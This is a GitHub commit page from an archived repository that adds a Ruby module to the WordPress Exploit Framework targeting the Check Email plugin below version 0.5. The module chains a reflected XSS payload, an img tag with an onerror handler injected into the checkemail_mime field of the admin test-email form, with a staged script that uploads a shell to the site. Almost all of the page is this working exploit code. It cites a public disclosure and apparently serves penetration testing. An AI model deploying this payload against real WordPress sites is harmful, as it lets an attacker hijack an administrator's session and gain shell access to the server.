Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 458b073

Browse files
committed
Add Check Email < 0.5 reflected XSS shell upload exploit
1 parent 50e81d0 commit 458b073

File tree

1 file changed

+42
-0
lines changed

1 file changed

+42
-0
lines changed
Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
class Wpxf::Exploit::CheckEmailReflectedXssShellUpload < Wpxf::Module
2+
include Wpxf::WordPress::StagedReflectedXss
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'Check Email < 0.5 Reflected XSS Shell Upload',
9+
author: [
10+
'Antonis Manaras', # Disclosure
11+
'Rob Carr <rob[at]rastating.com>' # WPXF module
12+
],
13+
references: [
14+
['WPVDB', '8661'],
15+
['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_check_email_wordpress_plugin.html']
16+
],
17+
date: 'Nov 12 2016'
18+
)
19+
end
20+
21+
def check
22+
check_plugin_version_from_readme('check-email', '0.5')
23+
end
24+
25+
def vulnerable_url
26+
normalize_uri(wordpress_url_admin, 'tools.php?page=checkemail')
27+
end
28+
29+
def initial_script
30+
create_basic_post_script(
31+
vulnerable_url,
32+
'checkemail_to' => Utility::Text.rand_email,
33+
'checkemail_headers' => 'custom',
34+
'checkemail_mime' => "\\\"><img src=x onerror=#{xss_ascii_encoded_include_script} />",
35+
'checkemail_type' => Utility::Text.rand_alphanumeric(5),
36+
'checkemail_from' => Utility::Text.rand_email,
37+
'checkemail_cc' => Utility::Text.rand_email,
38+
'checkemail_break' => '\n',
39+
'checkemail_go' => 'Send test email'
40+
)
41+
end
42+
end

0 commit comments

Comments
 (0)